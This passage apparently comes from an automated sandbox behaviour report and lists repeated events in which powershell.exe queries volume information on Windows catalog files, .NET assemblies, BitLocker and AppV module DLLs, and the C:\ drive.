Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
